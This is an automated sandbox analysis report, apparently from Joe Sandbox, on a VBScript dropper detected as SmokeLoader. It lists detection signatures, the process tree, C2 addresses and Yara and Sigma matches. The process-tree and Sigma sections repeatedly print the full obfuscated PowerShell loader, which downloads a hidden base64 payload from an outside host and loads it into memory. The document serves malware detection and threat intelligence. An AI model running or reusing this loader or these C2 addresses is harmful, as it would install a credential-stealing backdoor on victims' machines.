Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sweetnessgoodforgreatnessthingswithgood.tIF.vbs

Overview

General Information

Sample name:sweetnessgoodforgreatnessthingswithgood.tIF.vbs
Analysis ID:1586466
MD5:8ccd875893cd23b67d7c61ea735f5c52
SHA1:6171c7dd4f67a67fff0ca151c7e9a06104e00def
SHA256:16328212055d6aa79c45b6624607f74b732b159db4c6cdf7d8e6835ebdc6e392
Tags:SmokeLoadervbsuser-lontze7
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6292 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aspnet_compiler.exe (PID: 3824 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
        • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • explorer.exe (PID: 2060 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • explorer.exe (PID: 6080 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
          • explorer.exe (PID: 4656 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • explorer.exe (PID: 7140 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • explorer.exe (PID: 2508 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
            • WerFault.exe (PID: 2056 cmdline: C:\Windows\system32\WerFault.exe -u -p 2508 -s 696 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
          • explorer.exe (PID: 2908 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • explorer.exe (PID: 3988 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
          • explorer.exe (PID: 3916 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • explorer.exe (PID: 5144 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • uahuajd (PID: 1652 cmdline: C:\Users\user\AppData\Roaming\uahuajd MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
    0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x5d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        Click to see the 6 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        11.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_5128.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs", ProcessId: 6292, ProcessName: wscript.exe
            Sigma detected: AspNetCompiler Execution
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5128, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3824, ProcessName: aspnet_compiler.exe
            Sigma detected: Execution of Suspicious File Type Extension
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\uahuajd, CommandLine: C:\Users\user\AppData\Roaming\uahuajd, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\uahuajd, NewProcessName: C:\Users\user\AppData\Roaming\uahuajd, OriginalFileName: C:\Users\user\AppData\Roaming\uahuajd, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user\AppData\Roaming\uahuajd, ProcessId: 1652, ProcessName: uahuajd
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs", ProcessId: 6292, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
            Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = 